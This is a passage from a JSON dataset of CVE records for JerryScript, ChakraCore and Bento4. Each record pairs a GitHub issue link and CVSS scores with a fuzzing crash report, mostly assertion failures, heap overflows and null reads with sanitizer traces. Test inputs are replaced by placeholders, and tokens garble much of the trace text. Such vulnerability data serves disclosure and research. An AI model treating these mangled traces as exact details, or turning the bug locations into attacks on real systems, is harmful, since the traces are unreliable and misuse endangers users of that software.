PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG SUMMARY: APITAG stack overflow PATHTAG ecma_regexp_match NUMBERTAG ABORTING Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23308",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3819",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3819",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-31T13:53:00Z",
        "description": "ICE: Assertion 'context_p >stack_top_uint8 == LEXER_EXPRESSION_START' failed at PATHTAG APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23309",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3820",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3820",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-31T14:20:41Z",
        "description": "Assertion 'context_p >stack_depth == context_p >context_stack_depth' in parser_parse_statements. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23310",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3821",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3821",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-01T03:00:22Z",
        "description": "Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23311",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3822",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3822",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-01T03:10:23Z",
        "description": "Assertion 'context_p APITAG == LEXER_RIGHT_BRACE || context_p APITAG == LEXER_ASSIGN || context_p APITAG == LEXER_COMMA' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23312",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3824",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3824",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-01T04:16:48Z",
        "description": "Assertion APITAG & PARSER_SCANNING_SUCCESSFUL' in parser_parse_source. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23313",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3823",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3823",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-01T03:58:55Z",
        "description": "Assertion 'scope_stack_p > context_p >scope_stack_p' in scanner_literal_is_created. APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23314",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3825",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3825",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-01T04:41:43Z",
        "description": "Assertion 'block_found' in APITAG APITAG revision d NUMBERTAG c3a7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23315",
        "Issue_Url_old": "https://github.com/microsoft/ChakraCore/issues/6453",
        "Issue_Url_new": "https://github.com/chakra-core/chakracore/issues/6453",
        "Repo_new": "chakra-core/chakracore",
        "Issue_Created_At": "2020-06-01T09:03:35Z",
        "description": "APITAG in APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23319",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3834",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3834",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-03T03:42:30Z",
        "description": "Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE (flags >> CBC_STACK_ADJUST_SHIFT)) APITAG stack_depth' in APITAG APITAG revision a NUMBERTAG e NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23320",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3835",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3835",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-03T04:04:08Z",
        "description": "Assertion 'context_p >next_scanner_info_p >type == SCANNER_TYPE_FUNCTION' in APITAG APITAG revision a NUMBERTAG e NUMBERTAG f Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23321",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3870",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3870",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-06T14:03:56Z",
        "description": "heap buffer overflow in lit_read_code_unit_from_utf8. APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23322",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3869",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3869",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-06T13:55:33Z",
        "description": "Assertion 'context_p APITAG == LEXER_RIGHT_BRACE || context_p APITAG == LEXER_ASSIGN || context_p APITAG == LEXER_COMMA' in APITAG APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23323",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3871",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3871",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-07T10:51:46Z",
        "description": "heap buffer overflow in re_parse_char_escape. APITAG revision cae6cd0 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23330",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/511",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/511",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-05-16T12:08:52Z",
        "description": "SEGV by a READ memory access (address points to the zero page). Command: ./mp NUMBERTAG aac APITAG /tmp/out.aac APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f bp NUMBERTAG ffc6b NUMBERTAG a3d0 sp NUMBERTAG ffc6b NUMBERTAG a NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG e in APITAG int, unsigned int&) ( PATHTAG NUMBERTAG d7f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG a NUMBERTAG e in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG a NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG f1e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG int, unsigned int NUMBERTAG ABORTING Information provided by crashwalk: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: PROBABLY_NOT_EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG int, unsigned int NUMBERTAG f9b NUMBERTAG in PATHTAG Disassembly NUMBERTAG f9b NUMBERTAG jb NUMBERTAG f9b NUMBERTAG APITAG NUMBERTAG f9b NUMBERTAG test esi,esi NUMBERTAG f9b6b: je NUMBERTAG f9b NUMBERTAG APITAG NUMBERTAG f9b6d: mov rax,QWORD PTR [rdi NUMBERTAG f9b NUMBERTAG lea ecx,[rsi NUMBERTAG f9b NUMBERTAG mov ecx,DWORD PTR [rax+rc NUMBERTAG f9b NUMBERTAG or eax,ea NUMBERTAG f9b NUMBERTAG mov DWORD PTR [rdx],ec NUMBERTAG f9b7b: ret NUMBERTAG f9b7c: nop DWORD PTR [ra NUMBERTAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG f9b NUMBERTAG in PATHTAG APITAG NUMBERTAG ce NUMBERTAG in PATHTAG APITAG NUMBERTAG bd NUMBERTAG in PATHTAG main NUMBERTAG ab NUMBERTAG c: in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG c0 rc NUMBERTAG rd NUMBERTAG fffffffdb NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG a0 rbp NUMBERTAG rsp NUMBERTAG fffffffdae8 r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG a r NUMBERTAG r NUMBERTAG fffffffdb NUMBERTAG r NUMBERTAG fffffffdbf0 r NUMBERTAG rip NUMBERTAG f9b NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation near NULL on source operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. END SUMMARY",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23331",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/509",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/509",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-05-16T11:29:41Z",
        "description": "SEGV by a READ memory access in APITAG Command line: ./mp NUMBERTAG aac APITAG /tmp/out.aac Information provided by crashwalk: CRASH SUMMARY Filename: psym APITAG SHA1: APITAG Classification: PROBABLY_NOT_EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG NUMBERTAG de NUMBERTAG in PATHTAG Disassembly NUMBERTAG de NUMBERTAG test rbx,rb NUMBERTAG de NUMBERTAG je NUMBERTAG de NUMBERTAG APITAG NUMBERTAG de NUMBERTAG nop WORD PTR [rax+ra NUMBERTAG de NUMBERTAG mov rdi,QWORD PTR [rb NUMBERTAG de NUMBERTAG mov rsi,rbp NUMBERTAG de NUMBERTAG mov rax,QWORD PTR [rdi NUMBERTAG de NUMBERTAG call QWORD PTR [ra NUMBERTAG de NUMBERTAG c: mov rbx,QWORD PTR [rb NUMBERTAG de NUMBERTAG test rbx,rb NUMBERTAG de NUMBERTAG jne NUMBERTAG de NUMBERTAG APITAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG de NUMBERTAG in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG de NUMBERTAG c: in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG e NUMBERTAG fc: in PATHTAG APITAG NUMBERTAG e NUMBERTAG d: in PATHTAG APITAG NUMBERTAG c NUMBERTAG e7: in PATHTAG APITAG NUMBERTAG b4eef: in PATHTAG APITAG NUMBERTAG b7b5f: in PATHTAG APITAG NUMBERTAG bbf0d: in PATHTAG main NUMBERTAG ab4d2: in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG e4e0 rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG f5a0 rdi NUMBERTAG rbp NUMBERTAG f5a0 rsp NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG f5d0 r NUMBERTAG c r NUMBERTAG r NUMBERTAG ffff7d NUMBERTAG be0 r NUMBERTAG r NUMBERTAG f5a0 r NUMBERTAG f NUMBERTAG r NUMBERTAG d NUMBERTAG rip NUMBERTAG de NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Access violation near NULL on source operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. END SUMMARY Information provided by address sanitizer: APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG b NUMBERTAG bp NUMBERTAG ffee NUMBERTAG cd NUMBERTAG sp NUMBERTAG ffee NUMBERTAG cd7d0 T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG b NUMBERTAG in APITAG ) const ( PATHTAG NUMBERTAG e6e in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG e6e in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG fa NUMBERTAG in APITAG ( PATHTAG NUMBERTAG a7 in APITAG ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ( PATHTAG NUMBERTAG dd NUMBERTAG in APITAG int, unsigned short, unsigned short, unsigned short, char const , APITAG ) ( PATHTAG NUMBERTAG a in APITAG ( PATHTAG NUMBERTAG a NUMBERTAG e in APITAG int) ( PATHTAG NUMBERTAG b2 in main ( PATHTAG NUMBERTAG f NUMBERTAG df1e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG ) const NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23332",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/510",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/510",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2020-05-16T11:33:57Z",
        "description": "Heap buffer overflow in APITAG Command: ./mp NUMBERTAG aac APITAG /tmp/out.aac Information provided by address sanitizer: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b1 at pc NUMBERTAG e NUMBERTAG a0 bp NUMBERTAG fffb3ea0f NUMBERTAG sp NUMBERTAG fffb3ea NUMBERTAG d0 WRITE of size NUMBERTAG at NUMBERTAG b1 thread T NUMBERTAG e NUMBERTAG f in APITAG PATHTAG NUMBERTAG c3ccb in APITAG , unsigned int, unsigned int&) ( PATHTAG NUMBERTAG a in APITAG , unsigned int) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG ccec in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d3a NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f3d NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG NUMBERTAG b1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in operator APITAG long) PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa 